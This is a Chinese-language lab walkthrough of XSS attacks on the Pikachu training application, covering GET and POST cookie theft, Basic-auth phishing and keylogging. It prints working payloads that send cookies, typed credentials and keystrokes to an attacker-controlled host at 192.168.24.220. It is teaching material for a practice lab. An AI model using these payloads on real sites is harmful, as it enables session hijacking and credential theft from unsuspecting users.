Pikachu-XSS漏洞之cookie值獲取、釣魚結果和鍵盤記錄實戰記錄


入侵主機ip:192.168.24.220     靶機ip:192.168.24.140

好了,所有的Pikachu模塊我們都已經練習完了,但是還遺留下一些實戰訓練,我們今天就來一口氣完成!

一、XSS(get型)之cookie值獲取:

在開始做題之前我們先來一些准備工作:注意:最好設置兩台主機,Pikachu環境中的pkxss是可以隨意移動的獨立的XSS攻擊文件,我們需將pkxss文件移到入侵者的主機,搭建一個XSS后台,其也就是入侵者獲取cookie值得工具。

我們還要把靶機界面源碼的字符長度限制修改一下啊:

 

 

 我們先進入Xss后台查看一下,一條cookie值得獲取記錄都沒有:

 

 

在輸入框中輸入下面語句,輸入完后會重定向到Pikachu的首頁:我們提前設計好的。

<script>document.location = 'http://192.168.24.220/Pikachu-master/pkxss/xcookie/cookie.php?cookie=' + document.cookie;</script>

看,界面跳轉了,我們看看cookie值去!

 

 

 

cookie值:

 

 

 二、xss(post型)之cookie值獲取

首先我們登錄進去,我們發現界面和get型的是完全一樣的,我們隨便輸入點東西:發現並沒有在url里面顯示,那怎么回事那,其實這個就是post型的,請求是通過post的方式發送的。

 

 

我們抓包來看一下:

 

 

 果然是,那么怎么辦吶,有得法子,我們可以設置一個表單,當用戶點擊了我們的表單連接,就可以讓用戶替我們發送一個提交請求,這樣后面的就又和上面的get型一樣了!

但是之前我們要去修改幾個參數:

 

 

 @1、處的就是我們誘導用戶提交的post請求

@2、處的還是進入我們的平台,獲取cookie值。

我們修改完表單后,發送至另外一台主機,ip:192.168.24.130   發送到根目錄下。

我們需要讓用戶點擊的鏈接自然就是表單的(惡意站點):http://192.168.24.130/post.html

不多說,基本一樣!

 

三、Xss之釣魚攻擊

具體流程:我們可以向用戶發送一個鏈接請求,用戶點擊后會給我們提前搭建好的后台發出一個請求,后台收到請求后會返回一個身份信息驗證的Basic頭部,如果用戶安全意識不夠,輸入了敏感信息:用戶名和密碼,然后這些就會被發送到pkxss后台。

實驗:我們用到的是xss存儲型模塊。

首先進入是一個留言板:

 

 

 

我們只需要在這個留言板處嵌入一個能夠訪問我們后台后並且能返回Basic認證的標簽就行,

這里可以用a標簽、img、<script>

<img src="http://192.168.24.220/Pikachu-master/pkxss/xfish/fish.php" />

<script src="http://192.168.24.220/Pikachu-master/pkxss/xfish/fish.php"></script>

但是在這之前,我們還需要來做一些准備工作:

 

 

和我們之前獲取cookie一樣,釣魚的后台也有個接口(xfish.php)獲取遠程的數據,通過get方式去獲取賬號密碼存到庫里面。沒有結果會返回三個heard頭部

 

 

<script src="http://192.168.24.220/Pikachu-master/pkxss/xfish/fish.php"></script>

 

 

 

 看,成功了!

四、XSS獲取鍵盤記

跨域概念:http://(協議) www.(子域名)xyz.com(主域名):8080(端口)/ script/text.js(資源地址)
當協議、主機(主域名、子域名)、端口中的任意一個不相同時,稱為不同域。不同域之間請求數據的操作,稱為跨域操作。
跨域-同源策略
為了安全考慮,所有瀏覽器都約定了”同源策略“,同源策略規定,兩個不同域名之間不能使用JS進行相互操作。比如:x.com域名下的JavaScript並不能操作y,com域名下的對象。
如果想要跨域操作,則需要管理員進行特殊的配置。
比如通過:header(”Acess-Control-Allow-Origin:x.cm“)指定。
tips:以下標簽跨域加載資源(資源類型是有限制的)是不受同源策略限制的。

<script src="...">`//加載圖片到本地執行

<img src="..."> //圖片

<link href="...">//css

<iframe src="...">//任意資源
在pikachu存儲型xss模塊進行鍵盤記錄的實驗演示:
在存儲型xss漏洞模塊輸入<script src="http://192.168.24.220/Pikachu-master/pkxss/rkeypress/rk.js"></script>
此時這段JavaScript就被嵌入到了頁面中,此時在網頁上輸入的鍵盤就會被存儲到攻擊者的后台、

我們來進行實驗:(xss存儲模塊)

首先還是准備工作,修改ip:

 

輸入:

<script src= "http://192.168.24.220/Pikachu-master/pkxss/rkeypress/rk.js"></script>

1 由於192.168.24.220/Pikachu-master/pkxss/rkeypress/rkserver.php是攻擊者自己搭建的,攻擊者可以允許所有的人跨域請求他,因為這個網站是攻擊者自己的,為了實現攻擊目的,可以rkserver.php把里面的Access-Control允許所有人訪問。這樣的話,存在xss漏洞的頁面調js跨越請求的時候就可以正常訪問啦。改完,在頁面輸入后,pkxss后台會有鍵盤記錄
如果不是按照上圖修改,就會違反同源策略:

 

 同時正確的話后台就會獲取信息。

 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM